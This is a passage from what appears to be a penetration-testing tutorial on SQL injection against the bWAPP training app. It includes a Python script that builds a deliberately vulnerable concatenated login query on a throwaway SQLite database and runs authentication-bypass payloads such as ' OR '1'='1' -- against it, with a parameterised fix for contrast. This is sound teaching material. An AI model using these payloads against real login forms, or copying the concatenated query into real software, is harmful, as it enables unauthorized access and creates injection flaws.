Since you are already familiar with SQL injection from part 1 of this series, we will move straight to exploitation. Log in to your bWAPP instance and select the vulnerability SQL Injection (Login Form/Hero). As stated in the previous post, we first need some manual analysis to understand the functionality and how it is implemented. Try to log in with some random text (test / test) and note the response. A useful second probe is a single quote appended to the login (test'): a database error in the response is a strong sign that the input is concatenated straight into the query. Then do some static analysis by reviewing the source code of the functionality.
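As an added example (not code from bWAPP or from the original post), the Python script below models the login form's query against a throwaway in-memory SQLite database so the manual-analysis steps above can be reproduced offline: random credentials fail, a stray single quote produces a database error, and a quote-plus-comment payload logs in without knowing any password. The `heroes` table, its columns and its rows are constructed for this example; the parameterised `login_safe` is included for contrast and is not the page's own fix.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's user table.

    The table and column names (heroes, login, password, secret) are
    assumptions made for this example; the rows are made up.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE heroes (id INTEGER PRIMARY KEY, login TEXT, "
        "password TEXT, secret TEXT)"
    )
    conn.executemany(
        "INSERT INTO heroes (login, password, secret) VALUES (?, ?, ?)",
        [
            ("neo", "trinity", "follow the white rabbit"),
            ("alice", "loveZombies", "there is a cake"),
        ],
    )
    conn.commit()
    return conn


def build_vulnerable_query(login, password):
    # The bug: user input is concatenated straight into the SQL text, so the
    # input can close the quoted literal and change the query's grammar.
    return (
        "SELECT id, login, secret FROM heroes WHERE login = '"
        + login
        + "' AND password = '"
        + password
        + "'"
    )


def login_vulnerable(conn, login, password):
    """Return the login name of the matched hero, or None; raises on SQL errors."""
    row = conn.execute(build_vulnerable_query(login, password)).fetchone()
    return row[1] if row else None


def probe_vulnerable(conn, login):
    """Manual-analysis step: does a stray single quote break the query?

    A syntax error is the classic indication that the input reaches the
    query text unescaped (on a real target it shows up as an error page).
    """
    try:
        login_vulnerable(conn, login, "test")
    except sqlite3.OperationalError:
        return True
    return False


def login_safe(conn, login, password):
    """The fix: bound parameters keep the input as data, never as SQL grammar."""
    row = conn.execute(
        "SELECT id, login, secret FROM heroes WHERE login = ? AND password = ?",
        (login, password),
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    db = make_db()
    print("random text test/test        ->", login_vulnerable(db, "test", "test"))
    print("single-quote probe errors    ->", probe_vulnerable(db, "test'"))
    bypass = "' OR '1'='1' -- "  # MySQL needs the space after '--' too
    print("vulnerable, generic bypass   ->", login_vulnerable(db, bypass, "x"))
    print("vulnerable, pick user neo    ->", login_vulnerable(db, "neo' -- ", "x"))
    print("parameterised, same payload  ->", login_safe(db, bypass, "x"))
```

The `-- ` comment (with a trailing space) discards the rest of the original `WHERE` clause, which is why the password check never runs; bWAPP runs on MySQL, where the space after `--` is mandatory, so keep it in your payloads.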
To excel at penetration testing, you need your own lab for practice and research. I would suggest using virtual machines, for which free software is available. I would go with VMware Workstation rather than VirtualBox, but that is just my personal preference; either one will do.
1. VMware Workstation (download from the vendor's site)
2. Kali Linux ISO (download from the Kali Linux site)